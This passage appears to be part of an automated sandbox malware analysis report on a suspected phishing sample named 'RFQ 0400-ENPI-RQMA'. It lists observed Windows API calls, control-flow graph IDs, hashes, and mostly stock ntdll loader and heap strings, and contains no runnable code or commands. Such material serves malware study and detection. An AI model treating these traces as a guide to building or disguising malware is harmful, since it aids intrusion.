                                                                                      control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                      • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                                                                                      • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                      • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                      • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                                                                                      • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                      • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                                                      • Instruction ID: 40f2871b52f63c88f4cc1c547e67aebb1aa290b211a99a4ba27bdc265d11c441
                                                                                      • Opcode Fuzzy Hash: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                                                      • Instruction Fuzzy Hash: 4190023264550503D10071584514706200597E1241F65C412A0424569DC7A58A5166A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 367 1402b60-1402b6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                                                      • Instruction ID: f7abb23741fb9631f90feba312cfc9c607e7d2b337425d0ce8d941c3e46450b8
                                                                                      • Opcode Fuzzy Hash: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                                                      • Instruction Fuzzy Hash: 4C90027224240103410571584414616500A97F1241B55C022E1014591DC73589916225
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 369 1402df0-1402dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                                                      • Instruction ID: f5e6ed4886cc5ef95be3475614219ccbdc8723122e8b6fd04ba2f711a0c1abc2
                                                                                      • Opcode Fuzzy Hash: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                                                      • Instruction Fuzzy Hash: 6590023224140513D11171584504707100997E1281F95C413A0424559DD7668A52A221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 368 1402c70-1402c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
                                                                                      • Instruction ID: be69cc9455e01c74c08b05459a173eb290fec0238755d42d11526a71eff1a902
                                                                                      • Opcode Fuzzy Hash: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
                                                                                      • Instruction Fuzzy Hash: E790023224148903D1107158840474A100597E1341F59C412A4424659DC7A589917221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: C3vB7APK$C3vB7APK
                                                                                      • API String ID: 1836367815-224894077
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: C3vB7APK$C3vB7APK
                                                                                      • API String ID: 1836367815-224894077
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: !dA
                                                                                      • API String ID: 3298025750-3330550368
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 363 1402c0a-1402c0f 364 1402c11-1402c18 363->364 365 1402c1f-1402c26 LdrInitializeThunk 363->365
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-2160512332
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                      • API String ID: 0-3591852110
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                      • API String ID: 0-3063724069
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 0-1700792311
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • @, xrefs: 013BD2AF
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 013BD2C3
                                                                                      • @, xrefs: 013BD0FD
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 013BD146
                                                                                      • @, xrefs: 013BD313
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 013BD0CF
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 013BD262
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 013BD196
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 0-1745908468
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0143031E
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014302E7
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014302BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 013E5352
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 013E542B
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 013E527B
                                                                                      • WindowsExcludedProcs, xrefs: 013E522A
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 013E5247
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-3570731704
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      • API String ID: 0-379654539
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • @, xrefs: 013F8591
                                                                                      • LdrpInitializeProcess, xrefs: 013F8422
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013F855E
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 013F8421
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1918872054
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • MZER, xrefs: 013E16E8
                                                                                      • LdrpCompleteMapModule, xrefs: 0142A590
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0142A59A
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0142A589
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1409021520
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                      • API String ID: 0-336120773
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpDynamicShimModule, xrefs: 0142A998
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0142A992
                                                                                      • apphelp.dll, xrefs: 013E2462
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0142A9A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 013C1728
                                                                                      • HEAP: , xrefs: 013C1596
                                                                                      • HEAP[%wZ]: , xrefs: 013C1712
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                      • API String ID: 0-3870751728
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
